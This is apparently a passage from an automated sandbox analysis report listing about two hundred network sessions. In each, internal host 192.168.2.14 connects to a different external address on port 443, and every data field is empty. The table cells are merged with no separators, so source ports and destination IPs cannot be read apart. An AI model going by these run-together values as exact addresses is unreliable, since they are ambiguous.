                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15147192.168.2.143511482.154.5.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15148192.168.2.145650893.47.74.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15149192.168.2.145172223.205.106.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15150192.168.2.1450536210.142.164.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15151192.168.2.1446966109.155.80.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15152192.168.2.145909818.207.131.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15153192.168.2.144966842.252.41.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15154192.168.2.145526240.86.179.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15155192.168.2.1456132144.110.10.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15156192.168.2.144963668.16.213.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15157192.168.2.1456190120.98.14.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15158192.168.2.1439518120.202.232.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15159192.168.2.1442476200.139.69.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15160192.168.2.143439279.102.185.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15161192.168.2.1432996129.95.198.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15162192.168.2.1444598164.227.81.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15163192.168.2.1449202130.223.31.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15164192.168.2.1458142111.80.253.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15165192.168.2.1456900195.86.161.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15166192.168.2.1453138164.30.138.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15167192.168.2.1449544151.123.46.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15168192.168.2.1449166169.190.13.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15169192.168.2.1440006221.151.208.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15170192.168.2.1443566212.175.158.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15171192.168.2.1458542179.231.252.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15172192.168.2.1440036156.189.201.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15173192.168.2.1438926124.238.170.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15174192.168.2.145962843.227.243.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15175192.168.2.1433810178.118.101.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15176192.168.2.145444893.212.102.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15177192.168.2.14508548.208.160.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15178192.168.2.1436138209.131.116.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15179192.168.2.1454554207.179.86.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15180192.168.2.1442530122.215.68.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15181192.168.2.1457662192.114.230.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15182192.168.2.145844462.30.235.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15183192.168.2.144704057.76.152.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15184192.168.2.1437164134.2.11.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15185192.168.2.1458966116.93.55.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15186192.168.2.1442282148.136.182.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15187192.168.2.144376698.4.205.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15188192.168.2.145751437.144.121.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15189192.168.2.1444990117.213.171.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15190192.168.2.1453488198.234.18.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15191192.168.2.145722079.248.167.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15192192.168.2.145327640.126.221.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15193192.168.2.1456264114.87.166.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15194192.168.2.145880817.155.75.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15195192.168.2.1441406159.221.1.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15196192.168.2.14376508.178.145.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15197192.168.2.1444530107.124.192.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15198192.168.2.1449344120.49.219.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15199192.168.2.14352882.63.30.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15200192.168.2.1450604162.192.27.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15201192.168.2.1447670115.130.87.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15202192.168.2.1440468140.18.186.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15203192.168.2.143477425.93.152.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15204192.168.2.1457774179.60.190.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15205192.168.2.1451860147.64.18.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15206192.168.2.145250062.200.33.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15207192.168.2.1452450211.227.30.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15208192.168.2.145716265.89.102.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15209192.168.2.144657625.187.129.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15210192.168.2.1452134129.205.28.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15211192.168.2.1440750208.159.7.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15212192.168.2.1433478124.105.6.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15213192.168.2.1437982170.254.62.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15214192.168.2.1453378176.225.109.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15215192.168.2.144082651.165.14.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15216192.168.2.1454262149.179.91.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15217192.168.2.1444724102.186.72.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15218192.168.2.1446994103.79.216.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15219192.168.2.1459420191.214.105.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15220192.168.2.144231058.113.152.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15221192.168.2.1453602110.41.173.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15222192.168.2.1448922122.94.182.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15223192.168.2.1450362216.142.155.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15224192.168.2.1453058161.73.134.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15225192.168.2.1445070111.89.92.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15226192.168.2.145432824.230.41.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15227192.168.2.144832838.243.220.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15228192.168.2.1442108187.199.124.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15229192.168.2.1460184119.82.228.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15230192.168.2.1457354120.66.143.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15231192.168.2.145782843.121.229.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15232192.168.2.1438244135.78.41.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15233192.168.2.1433970128.114.48.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15234192.168.2.1453276102.218.177.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15235192.168.2.144574475.23.57.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15236192.168.2.144325461.216.98.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15237192.168.2.144868841.29.178.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15238192.168.2.1443274141.124.15.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15239192.168.2.1446140117.135.196.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15240192.168.2.1435122168.150.159.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15241192.168.2.144963848.33.104.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15242192.168.2.145679051.225.161.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15243192.168.2.1440856182.23.70.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15244192.168.2.1435478170.107.194.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15245192.168.2.143541870.5.141.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15246192.168.2.1448674109.16.114.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15247192.168.2.1443192198.247.81.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15248192.168.2.14439089.225.70.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15249192.168.2.145048625.105.3.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15250192.168.2.1457438152.151.204.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15251192.168.2.143318254.12.104.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15252192.168.2.143710890.47.233.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15253192.168.2.143828061.76.43.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15254192.168.2.1439506123.73.111.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15255192.168.2.1458286184.188.56.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15256192.168.2.145606823.59.19.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15257192.168.2.145934444.131.45.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15258192.168.2.1437928171.101.215.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15259192.168.2.144975061.67.90.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15260192.168.2.144973648.164.69.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15261192.168.2.1433160156.2.55.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15262192.168.2.1436726103.221.170.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15263192.168.2.1448318174.104.186.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15264192.168.2.144971497.51.71.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15265192.168.2.1444932160.22.25.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15266192.168.2.1445784117.222.207.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15267192.168.2.1453346148.236.68.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15268192.168.2.1460390168.186.243.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15269192.168.2.1444092184.242.32.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15270192.168.2.1447574128.192.53.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15271192.168.2.1444698111.60.33.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15272192.168.2.145174024.93.249.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15273192.168.2.145477812.118.176.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15274192.168.2.1437302171.240.82.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15275192.168.2.1456362123.227.232.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15276192.168.2.1439080220.170.204.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15277192.168.2.1448814169.71.89.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15278192.168.2.144350452.130.87.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15279192.168.2.145405673.243.62.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15280192.168.2.1433320116.241.55.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15281192.168.2.145699883.62.109.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15282192.168.2.1450904139.189.145.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15283192.168.2.14607448.237.234.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15284192.168.2.1443334161.146.15.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15285192.168.2.143913253.172.0.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15286192.168.2.144501073.226.38.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15287192.168.2.144441275.150.188.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15288192.168.2.143716047.95.211.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15289192.168.2.1449630206.133.28.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15290192.168.2.1459744201.116.238.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15291192.168.2.14479282.135.200.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15292192.168.2.1434742195.79.16.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15293192.168.2.1450702139.94.223.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15294192.168.2.1457998156.167.228.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15295192.168.2.1454010160.226.123.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15296192.168.2.1441366135.175.121.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15297192.168.2.1457670153.128.207.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15298192.168.2.144146489.13.75.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15299192.168.2.1455548222.152.180.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15300192.168.2.144630024.15.87.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15301192.168.2.1455020207.238.143.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15302192.168.2.145449259.167.203.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15303192.168.2.1446466138.219.27.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15304192.168.2.1439128221.156.23.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15305192.168.2.143328632.209.244.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15306192.168.2.144328441.139.223.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15307192.168.2.1436274207.190.47.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15308192.168.2.144586871.198.198.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15309192.168.2.143861886.87.188.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15310192.168.2.1458754164.72.42.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15311192.168.2.1455646155.102.121.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15312192.168.2.143954643.36.169.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15313192.168.2.1452198145.190.174.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15314192.168.2.1459870156.38.21.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15315192.168.2.145993451.134.88.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15316192.168.2.1456152182.21.61.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15317192.168.2.143957451.4.237.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15318192.168.2.145061669.218.193.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15319192.168.2.143296841.188.130.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15320192.168.2.1443574181.110.60.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15321192.168.2.144542635.54.49.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15322192.168.2.1435290196.198.163.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15323192.168.2.145475224.66.120.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15324192.168.2.1458876210.229.242.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15325192.168.2.144530885.69.217.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15326192.168.2.1447736188.44.255.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15327192.168.2.145463662.39.23.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15328192.168.2.1456592223.140.141.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15329192.168.2.1453080165.178.50.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15330192.168.2.144474697.202.84.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15331192.168.2.144518047.10.1.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15332192.168.2.145388480.244.120.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15333192.168.2.145268065.84.117.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15334192.168.2.1445300208.16.45.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15335192.168.2.1437090195.159.96.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15336192.168.2.1442262152.1.115.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15337192.168.2.1443778165.199.238.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15338192.168.2.1433028140.219.88.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15339192.168.2.1438480178.86.95.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15340192.168.2.143485253.187.5.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15341192.168.2.144603213.17.236.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15342192.168.2.1441142150.97.231.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15343192.168.2.1445842213.238.28.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15344192.168.2.144900235.249.76.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15345192.168.2.144969076.106.213.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15346192.168.2.1450258145.94.1.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15347192.168.2.145982252.10.12.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15348192.168.2.1458946118.170.178.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15349192.168.2.1435344204.139.235.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15350192.168.2.143868645.120.50.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15351192.168.2.145076087.83.230.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15352192.168.2.144251284.81.130.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15353192.168.2.143633844.248.107.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15354192.168.2.1449306187.40.35.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15355192.168.2.1433474129.254.54.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15356192.168.2.1433678186.56.141.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15357192.168.2.1450592208.248.188.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15358192.168.2.146099043.241.216.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
